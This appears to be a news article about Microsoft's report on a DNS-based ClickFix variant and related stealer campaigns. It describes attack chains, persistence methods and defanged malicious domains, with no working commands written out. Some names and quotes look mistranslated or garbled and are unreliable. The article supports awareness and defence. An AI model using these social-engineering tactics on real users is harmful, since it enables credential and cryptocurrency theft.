Microsoft has revealed details of a new variant of the ClickFix social engineering tactic in which attackers trick unsuspecting users into running commands that perform domain name system (DNS) lookups to retrieve the next stage’s payload.
Specifically, the attack relies on using the “nslookup” (short for nameserver lookup) command to perform a custom DNS lookup triggered through the Windows Run dialog.
ClickFix is an increasingly popular technique traditionally distributed via phishing, malware, or drive-by download schemes, often redirecting targets to fake landing pages that host fake CAPTCHA verifications or instructions to fix a non-existent problem on their computer by running a command through the Windows Run dialog or the macOS Terminal app.
The attack method has become widespread over the past two years because it relies on victims infecting their machines with malware, allowing threat actors to bypass security controls. The effectiveness of ClickFix has been such that it has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
“In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server instead of the system’s default resolver,” the Microsoft Threat Intelligence team said in a series of posts on X. The output is filtered to extract the ‘name:’ DNS response, which is executed as the payload of the second stage.’
Microsoft said this new version of ClickFix uses DNS as a “lightweight staging or signaling channel”, enabling the threat actor to access infrastructure under their control, as well as erecting a new verification layer before executing the second-stage payload.
“Using DNS in this way reduces reliance on traditional web requests and can help malicious activity blend into normal network traffic,” the Windows maker said.
The downloaded payload subsequently initiates an attack chain that leads to downloading the zip archive from an external server (“azwsappdev[.]com”), from which a malicious Python script is extracted and run to drop a Visual Basic script (VBScript) responsible for performing reconnaissance, running discovery commands, and launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.
To establish persistence, a Windows Shortcut (LNK) file pointing to VBScript is created in the Windows Startup folder so that the malware is automatically launched every time the operating system starts.
The disclosure comes as Bitdefender warned of an increase in Lumma Stealer activity, driven by ClickFix-style fake CAPTCHA campaigns that deploy an Autoit-version of CastleLoader, a malware loader associated with the threat actor codenamed GrabRavo (formerly TAG-150).
CastleLoader incorporates checks to determine the presence of virtualization software and specific security programs before decrypting and launching memory-stealing malware. Outside of ClickFix, websites advertising cracked software and pirated movies serve as bait for CastleLoader-based attack chains, which trick users into downloading fake installers or executables masquerading as MP4 media files.
Other Castleloader campaigns have also taken advantage of websites promising cracked software downloads as a starting point to distribute a fake NSIS installer, which also runs obscure VBA scripts before running the AutoIT script that loads Lumma Stealer. The VBA Loader is designed to run scheduled tasks responsible for ensuring persistence.
“Despite significant law enforcement disruption efforts in 2025, Lumma Stealer continued to operate, demonstrating resiliency by rapidly migrating to new hosting providers and adopting alternative loaders and delivery technologies,” the Romanian cybersecurity company said. “At the core of many of these campaigns is Castleloader, which plays a central role in helping Lummastealer spread through delivery chains.”
Interestingly, one of the domains on Castleloader’s infrastructure (“testdomain123123[.]shop”) was marked as Lumma Stealer Command-and-Control (C2), indicating that the operators of the two malware families are either working together or sharing service providers. The majority of Lumma Stealer infection cases have been reported in India, followed by France, the US, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
Bitdefender said, “ClickFix’s effectiveness lies in the abuse of procedural trust rather than technical vulnerabilities.” “The instructions resemble troubleshooting steps or verification solutions that users may have encountered before. As a result, victims often fail to recognize that they are manually executing arbitrary code on their system.”
CastleLoader is not the only loader that is being used to distribute Lumma Stealer. Campaigns observed as early as March 2025 have taken advantage of another loader called RainEngine Loader to propagate malware under the guise of game cheats and pirated software such as CorelDRAW graphics editor. In these attacks, the loader makes way for a secondary loader called a hijack loader, which then deploys the Lumma Stealer.
According to Kaspersky data, RainEngine Loader attacks since March 2025 have primarily affected users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.
This development coincides with the emergence of various campaigns using social engineering lures, including ClickFix, to distribute various types of stealers and malware loaders –
- A macOS campaign that has used phishing and malware tricks to distribute Odyssey Stealer, a rebrand of Poseidon Stealer, itself a fork of Atomic macOS Stealer (AMOS). The thief exfiltrated credentials and data from 203 browser wallet extensions and 18 desktop wallet applications to facilitate cryptocurrency theft.
- “Beyond credential theft, Odyssey operates as a full remote access trojan,” Sensis said. “A persistent launchdaemon polls C2 every 60 seconds for commands, supporting arbitrary shell execution, re-infection, and SOCKS5 proxies to tunnel traffic through victim machines.”
- A ClickFix attack series targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing Powershell commands deploys the Stealsee information stealer.
- An email phishing campaign that uses a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a Powershell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stellarium.
- A campaign that uses the public sharing feature of generative artificial intelligence (AI) services like Anthropic Cloud to stage malicious ClickFix instructions on how to perform various tasks on macOS (for example, “Online DNS Resolver”), and distributes these links through sponsored results on search engines like Google to deploy Atomic Stealer and MacSync Stealer.
- A campaign that directs users to search for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s support team, in order to trick them into running the ClickFix instruction, which delivers the next stage’s stealth payload from an external server called “raxelpak”.[.]com.”
- “C2 Domain Raxelpak[.]com’s URL history dates back to 2021, when it appeared to host a safety workwear e-commerce site,” MacPaw’s Moonlock Lab said. ”Was the domain hijacked or simply expired and re-registered [threat actor] Unclear, but it fits into a broader pattern of leveraging old domains with existing reputations to avoid detection.”
- A variation of the same campaign that stages ClickFix instructions for installing Homebrew on links to the cloud and Evernote through sponsored results to install stealthy malware.
- “The ad shows a genuine, recognized domain (cloude.ai), not a spoof or typo-squatted site,” Edgard said. “Clicking on the ad leads to a real cloud page, not a phishing copy. The result is clear: Google ads + a well-known trusted platform + technical users with high downstream influence = a powerful malware distribution vector.”
- A macOS email phishing campaign that induces recipients to download and run an AppleScript file intended to address alleged compatibility issues, resulting in the deployment of another AppleScript designed to steal credentials and recover additional JavaScript payloads.
- Darktrace said, “The malware does not grant itself permissions; instead, it creates TCC authorizations for trusted Apple-signed binaries (Terminal, OSScript, Script Editor, and Bash) and then executes malicious actions via these binaries to gain their permissions.”
- A clearfake campaign that lures a fake CAPTCHA onto compromised WordPress sites to trigger HTML application (HTA) file execution and deploy Lumma Stealer. The campaign is also known to have used malicious JavaScript injection to execute a contract hosted on the BNB smart chain and leverage a technique called etherhiding to fetch an unknown payload hosted on GitHub.
- EtherHiding provides several benefits to attackers, allowing malicious traffic to be mixed with legitimate Web3 activity. Because blockchain is immutable and decentralized, it provides increased resiliency in the face of takedown attempts.
A recent analysis published by Flare found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools.
“Almost every macOS thief prioritizes stealing cryptocurrency above everything else,” the company said. “This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once the seed phrases are compromised, the funds disappear permanently with no recourse.”
“The notion that ‘Macs don’t have viruses’ is not only outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.”
